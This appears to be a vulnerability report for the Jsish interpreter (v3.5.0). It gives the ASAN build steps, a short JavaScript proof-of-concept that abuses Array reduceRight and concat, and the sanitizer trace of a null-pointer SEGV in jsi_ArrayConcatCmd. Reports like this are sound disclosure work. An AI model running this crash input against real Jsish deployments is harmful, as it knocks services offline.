Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var i = 0;

function JSEtest() { arr[arr[1000] = 3] = 3; i++; }

var arr = new Array(10); arr[2] = 2; arr.concat(JSEtest);

(arr.reduceRight(arr.concat), 0, ‘1’);

​

Execution steps & Output

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL

==121369==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x563e6997e690 bp 0x00000000000a sp 0x7ffcb3c19980 T0) ==121369==The signal is caused by a READ memory access. ==121369==Hint: address points to the zero page. #0 0x563e6997e68f in jsi_ArrayConcatCmd src/jsiArray.c:311 #1 0x563e69943818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x563e698c0fec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x563e698c0fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x563e69985851 in jsi_ArrayReduceSubCmd src/jsiArray.c:641 #5 0x563e69985851 in jsi_ArrayReduceRightCmd src/jsiArray.c:672 #6 0x563e69943818 in jsi_FuncCallSub src/jsiProto.c:244 #7 0x563e69c0d71a in jsiFunctionSubCall src/jsiEval.c:796 #8 0x563e69c0d71a in jsiEvalFunction src/jsiEval.c:837 #9 0x563e69c0d71a in jsiEvalCodeSub src/jsiEval.c:1264 #10 0x563e69c2115e in jsi_evalcode src/jsiEval.c:2204 #11 0x563e69c25274 in jsi_evalStrFile src/jsiEval.c:2665 #12 0x563e6991466a in Jsi_Main src/jsiInterp.c:936 #13 0x563e6a11903a in jsi_main src/main.c:47 #14 0x7fde1e7babf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #15 0x563e698a8969 in _start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd

Credits: Found by OWL337 team.